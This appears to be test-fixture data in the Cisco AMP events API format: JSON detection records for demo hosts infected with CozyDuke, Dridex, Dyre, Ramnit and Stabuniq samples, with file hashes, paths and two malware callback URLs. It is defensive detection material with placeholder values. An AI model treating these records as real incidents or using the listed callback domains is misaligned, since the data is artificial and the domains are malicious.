-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":51000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491268","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491267","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":427000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208003834970000,"timestamp":1610704859,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:00:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208003834970125","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292743539720000,"timestamp":1610704858,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292734949785601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254780868919000,"timestamp":1610704856,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:00:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254780868919310","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363247763718000,"timestamp":1610704849,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2457,"scanned_processes":40,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254733624279000,"timestamp":1610704845,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:00:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254733624279053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207939410461000,"timestamp":1610704844,"timestamp_nanoseconds":773000000,"date":"2021-01-15T10:00:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207939410460684","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265962459496000,"timestamp":1610704840,"timestamp_nanoseconds":622000000,"date":"2021-01-15T10:00:40+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1460,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892466943623000,"timestamp":1610704839,"timestamp_nanoseconds":336000000,"date":"2021-01-15T10:00:39+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2280,"scanned_processes":41,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207909345690000,"timestamp":1610704837,"timestamp_nanoseconds":4000000,"date":"2021-01-15T10:00:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207909345689611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899987000600,"timestamp":1610704833,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Ramnit.A","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704833,"start_date":"2021-01-15T10:00:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://benhomelandefit.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":132000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232643","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":542000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671500","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":526000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671499","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":370000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671498","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":261000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":214000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671496","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663807451562000,"timestamp":1610704833,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663807451561998","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://sovereutilizeignty.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} 